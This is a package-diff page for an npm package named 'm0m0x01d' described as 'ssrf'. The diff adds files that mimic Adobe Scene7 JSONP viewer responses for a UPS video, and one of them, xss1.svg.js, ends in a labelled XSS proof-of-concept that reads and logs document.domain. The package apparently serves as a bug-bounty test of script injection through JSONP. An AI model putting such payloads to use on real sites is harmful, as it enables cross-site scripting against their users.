m0m0x01d 24.0.0 → 26.0.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (3) hide show
  1. package/media.js +7 -0
  2. package/package.json +1 -1
  3. package/xss1.svg.js +46 -0
package/media.js ADDED
@@ -0,0 +1,7 @@
1
+ /*jsonp*/
2
+ s7sdkJSONResponse({
3
+ "style": "Scene7SharedAssets/htmlviewerskins/css/html5_mixedMedia.css",
4
+ "type": "MixedMediaHTML5Mobile",
5
+ "vt": "MediaSetVirtual"
6
+ }, "192959476");
7
+
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "m0m0x01d",
3
- "version": "24.0.0",
3
+ "version": "26.0.0",
4
4
  "description": "ssrf",
5
5
  "main": "index.html",
6
6
  "scripts": {
package/xss1.svg.js ADDED
@@ -0,0 +1,46 @@
1
+ /*jsonp*/
2
+ s7classics7sdkJSONResponse({
3
+ "set": {
4
+ "pv": "1.0",
5
+ "type": "video",
6
+ "n": "upsprod/UPS_Coco_30s_16x9_v008_op001_Web_Mix",
7
+ "item": {
8
+ "v": {
9
+ "path": "upsprod/_media_/e03/e035b19f-f70b-4213-9b2a-e49a8cfce5b4.mp4",
10
+ "dx": "1920",
11
+ "dy": "1080",
12
+ "bitrate": "60947580",
13
+ "id": "upsprod/UPS_Coco_30s_16x9_v008_op001_Web_Mix",
14
+ "suffix": "mp4"
15
+ },
16
+ "i": {
17
+ "mod": "layer=0&src=is(upsprod/Coco vs. the Doubters_Coco with SMBs)",
18
+ "n": "upsprod/UPS_Coco_30s_16x9_v008_op001_Web_Mix"
19
+ },
20
+ "type": "video",
21
+ "iv": "zJZEa1",
22
+ "userdata": [{
23
+ "Audio_Codec": "AAC LC",
24
+ "Audio_Sample_Rate": "48.0",
25
+ "Number_Audio_Channels": "2",
26
+ "Video_Codec": "AVC",
27
+ "Video_Frame_Rate": "24.000",
28
+ "Video_Length": "30.0"
29
+ }, {
30
+ "Audio_Codec": "AAC LC",
31
+ "Audio_Sample_Rate": "48.0",
32
+ "Number_Audio_Channels": "2",
33
+ "Video_Codec": "AVC",
34
+ "Video_Frame_Rate": "24.000",
35
+ "Video_Length": "30.0"
36
+ }]
37
+ }
38
+ }
39
+ }, "130443601");
40
+
41
+ // XSS payload: inject document.domain into the JSONP response without breaking functionality
42
+ (function(){
43
+ var xss_payload = document.domain;
44
+ console.log("Injected XSS payload: " + xss_payload);
45
+ })();
46
+